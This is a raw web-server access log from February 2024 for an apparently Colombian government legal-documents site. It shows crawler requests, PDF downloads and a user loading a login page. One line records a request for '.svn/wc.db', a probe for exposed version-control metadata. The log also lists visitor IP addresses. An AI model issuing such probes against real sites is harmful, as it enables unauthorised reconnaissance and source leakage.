156.59.198.136 - - [20/Feb/2024:05:45:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2212.pdf HTTP/1.0" 200 751843
47.128.41.135 - - [20/Feb/2024:05:46:24 -0500] "GET /robots.txt HTTP/1.1" 404 1018
216.245.221.92 - - [20/Feb/2024:05:46:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:05:45:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
216.245.221.92 - - [20/Feb/2024:05:51:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:05:50:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:05:50:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57476
52.167.144.187 - - [20/Feb/2024:05:53:27 -0500] "GET /Publicaciones/2023EE63443.pdf HTTP/1.1" 404 227
172.22.2.4 - - [20/Feb/2024:05:52:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61084
66.249.66.19 - - [20/Feb/2024:05:55:25 -0500] "GET /resoluciones/RESOLUCIONES%202007/RES%202007%202301%20AL%202400/RESOLUCION%202370%20DE%202007.pdf HTTP/1.1" 404 1018
216.245.221.92 - - [20/Feb/2024:05:56:31 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.38 - - [20/Feb/2024:05:57:19 -0500] "GET /desde-el-paramo-mas-grande-del-mundo-sumapaz-bogota-se-alista-para-ser-sede-de-la-cop16.html HTTP/1.1" 200 981
116.202.17.133 - - [20/Feb/2024:05:57:31 -0500] "GET /resoluciones/AUTOS%202007/3485.pdf%E2%80%A2 HTTP/1.1" 404 1018
172.22.2.4 - - [20/Feb/2024:05:55:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:05:57:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [20/Feb/2024:05:56:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55814
52.167.144.167 - - [20/Feb/2024:06:00:48 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2016%2F HTTP/1.1" 200 331791
216.245.221.92 - - [20/Feb/2024:06:01:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:06:02:50 -0500] "GET /BLA/boletinlegal/.svn/wc.db HTTP/1.1" 404 1018
172.22.2.4 - - [20/Feb/2024:06:01:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:06:02:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
185.224.128.200 - - [20/Feb/2024:06:04:46 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [20/Feb/2024:06:06:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:06:07:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:06:08:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
216.245.221.92 - - [20/Feb/2024:06:11:31 -0500] "HEAD / HTTP/1.1" 200 -
190.27.21.3 - - [20/Feb/2024:06:12:45 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12404
190.27.21.3 - - [20/Feb/2024:06:12:45 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
190.27.21.3 - - [20/Feb/2024:06:12:45 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
190.27.21.3 - - [20/Feb/2024:06:12:45 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
190.27.21.3 - - [20/Feb/2024:06:12:45 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
190.27.21.3 - - [20/Feb/2024:06:12:45 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.27.21.3 - - [20/Feb/2024:06:12:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.27.21.3 - - [20/Feb/2024:06:12:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.27.21.3 - - [20/Feb/2024:06:12:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.27.21.3 - - [20/Feb/2024:06:12:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.27.21.3 - - [20/Feb/2024:06:12:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.27.21.3 - - [20/Feb/2024:06:12:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.27.21.3 - - [20/Feb/2024:06:12:46 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
190.27.21.3 - - [20/Feb/2024:06:12:46 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.27.21.3 - - [20/Feb/2024:06:12:46 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
190.27.21.3 - - [20/Feb/2024:06:12:46 -0500] "GET /sipse/faces/faces/index.xhtml HTTP/1.1" 200 677
190.27.21.3 - - [20/Feb/2024:06:12:46 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.27.21.3 - - [20/Feb/2024:06:12:47 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12404
190.27.21.3 - - [20/Feb/2024:06:12:47 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.27.21.3 - - [20/Feb/2024:06:12:47 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.27.21.3 - - [20/Feb/2024:06:12:47 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
